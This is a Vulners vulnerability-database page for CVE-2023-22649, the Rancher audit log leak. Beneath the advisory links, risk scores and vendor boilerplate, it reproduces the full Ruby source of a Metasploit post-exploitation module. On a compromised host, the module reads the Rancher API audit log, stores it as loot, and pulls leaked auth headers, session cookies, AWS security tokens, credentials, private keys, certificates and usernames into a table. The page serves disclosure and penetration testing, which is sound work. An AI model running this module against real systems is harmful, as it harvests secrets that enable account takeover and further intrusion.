Lucene search
K

Rancher Audit Log Sensitive Information Leak

🗓️ 10 Apr 2024 19:54:27Reported by h00dieType 
metasploit
 metasploit
🔗 www.rapid7.com👁 252 Views

Rancher Audit Log Sensitive Information Leak between versions 2.6.0-2.8.1. API Audit Log enabled deployments are impacted. Leaked info found in request, response headers, and body

Related
Code
ReporterTitlePublishedViews
Family
Chainguard
CVE-2023-22649 vulnerabilities
2 Jul 202614:17
cgr
Circl
CVE-2023-22649
10 Apr 202416:08
circl
CNNVD
Rancher 日志信息泄露漏洞
16 Oct 202400:00
cnnvd
CVE
CVE-2023-22649
16 Oct 202407:46
cve
Cvelist
CVE-2023-22649 Rancher 'Audit Log' leaks sensitive information
16 Oct 202407:46
cvelist
Github Security Blog
Rancher 'Audit Log' leaks sensitive information
8 Feb 202418:44
github
NVD
CVE-2023-22649
16 Oct 202408:15
nvd
OSV
CGA-M248-MW8G-CRWG
2 Jul 202612:58
osv
OSV
CVE-2023-22649
16 Oct 202408:15
osv
OSV
GHSA-XFJ7-QF8W-2GCR Rancher 'Audit Log' leaks sensitive information
8 Feb 202418:44
osv
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Rancher Audit Log Sensitive Information Leak',
        'Description' => %q{
          Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive
          contain a vulnerability where sensitive data is leaked into the audit logs.
          Rancher Audit Logging is an opt-in feature, only deployments that have it
          enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.

          Tested against rancher 2.6.0.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
        ],
        'Platform' => ['linux', 'unix'],
        'SessionTypes' => ['shell', 'meterpreter'],
        'References' => [
          [ 'GHSA', 'xfj7-qf8w-2gcr' ],
          [ 'URL', 'https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options'],
          [ 'CVE', '2023-22649']
        ],
        'DisclosureDate' => '2024-02-08',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )
    register_advanced_options [
      OptString.new('LOGFILE', [ true, 'The log file to analyze', '/var/log/auditlog/rancher-api-audit.log' ])
    ]
  end

  def run
    # docker install, and default path according to https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options
    fail_with Failure::BadConfig, "#{datastore['LOGFILE']} is not readable or not found" unless readable?(datastore['LOGFILE'])

    log = read_file(datastore['LOGFILE'])
    loot = store_loot('rancher.api.log', 'text/plain', session, log, 'rancher.api.txt', 'Rancher API Log')
    print_good("Rancher log saved to: #{loot}")

    usernames_found = []
    table = Rex::Text::Table.new('Header' => 'Leaked Information', 'Indent' => 1, 'Columns' => ['Field', 'Value', 'Location'])

    log.each_line do |line|
      leaky_request_headers = ['X-Api-Auth-Header', 'X-Amz-Security-Token']
      leaky_response_headers = ['X-Api-Set-Cookie-Header']
      leaky_request_body = ['credentials', 'applicationSecret', 'oauthCredential', 'serviceAccountCredential', 'spKey', 'spCert', 'certificate', 'privateKey']

      json_line = JSON.parse(line)

      if json_line.key? 'requestHeader'
        leaky_request_headers.each do |leaky_field|
          next unless json_line['requestHeader'].key? leaky_field

          secret = json_line['requestHeader'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field} #{secret}")
          table << [leaky_field, secret, 'requestHeader']
        end
      end

      if json_line.key? 'responseHeader'
        leaky_response_headers.each do |leaky_field|
          next unless json_line['responseHeader'].key? leaky_field

          secret = json_line['responseHeader'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field}: #{secret}")
          table << [leaky_field, secret, 'responseHeader']
        end
      end

      if json_line.key? 'requestBody'
        leaky_request_body.each do |leaky_field|
          next unless json_line['requestBody'].key? leaky_field

          secret = json_line['requestBody'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field} in #{secret}")
          table << [leaky_field, secret, 'requestBody']
        end
      end

      if json_line.key? 'responseBody'
        leaky_request_body.each do |leaky_field|
          next unless json_line['responseBody'].key? leaky_field

          secret = json_line['responseBody'][leaky_field]
          secret = secret.join(' ') if secret.is_a?(Array)
          print_good("Found #{leaky_field} in #{secret}")
          table << [leaky_field, secret, 'responseBody']
        end
      end

      usernames = json_line.dig('user', 'extra', 'username')
      next if usernames.nil?

      usernames_found += usernames
    end

    usernames_found.uniq.each do |username|
      table << ['Username', username, 'Requests']
    end

    print_line
    print_line(table.to_s)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jul 2026 19:03Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.5 - 8.4
CVSS 48.4
EPSS0.01882
SSVC
252